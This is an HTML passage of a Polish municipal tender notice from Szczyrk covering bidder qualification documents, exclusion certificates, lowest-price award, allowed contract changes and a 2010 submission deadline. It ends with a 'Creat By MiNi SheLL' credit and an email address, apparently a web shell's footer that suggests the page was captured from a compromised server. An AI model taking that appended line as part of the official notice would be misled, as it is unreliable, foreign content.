</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia udokumentują:  
a.posiadanie środków finansowych lub zdolność kredytową na kwotę nie mniejszą niż 500.000,00 zł (pięćset tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie w trybie art. 22 ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy przy zaistnieniu następujących warunków :
1) zmiana  przewidzianego w umowie terminu zakończenia robót w przypadku:  
a)  zmiany spowodowanej warunkami atmosferycznymi, w szczególności 
-  klęski żywiołowej ,
- warunków atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót drogowych (potwierdzone wpisem inspektora nadzoru) 
b)  zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, lub terenowymi, w szczególności istnienie nie zinwentaryzowanych  lub błędnie zinwentaryzowanych obiektów budowlanych  lub urządzeń. 
c) zmiany  będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności :
-  wstrzymanie robót przez  Zamawiającego,
- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót,
2) Zmiana sposobu realizacji robót  na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
- konieczność realizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdy zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy .
- niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub w specyfikacji technicznej wykonania i odbioru robót  spowodowanych zaprzestaniem produkcji  lub wycofania z rynku tych materiałów i urządzeń    
3. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami .
- zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmiany zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
- następstwa wprowadzenia zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia, w tym przepisów dotyczących realizacji inwestycji ze środków unijnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.szczyrk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szczyrku
Ul. Beskidzka 4
43-370 Szczyrk
pok. 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2010 godzina 10:00, miejsce: Urząd Miejski w Szczyrku
Ul. Beskidzka 4
43-370 Szczyrk
Dziennik Podawczy pok. 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany  przez Unie Europejska z Europejskiego Funduszu Rozwoju Regionalnego  w ramach RPO WSL  2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com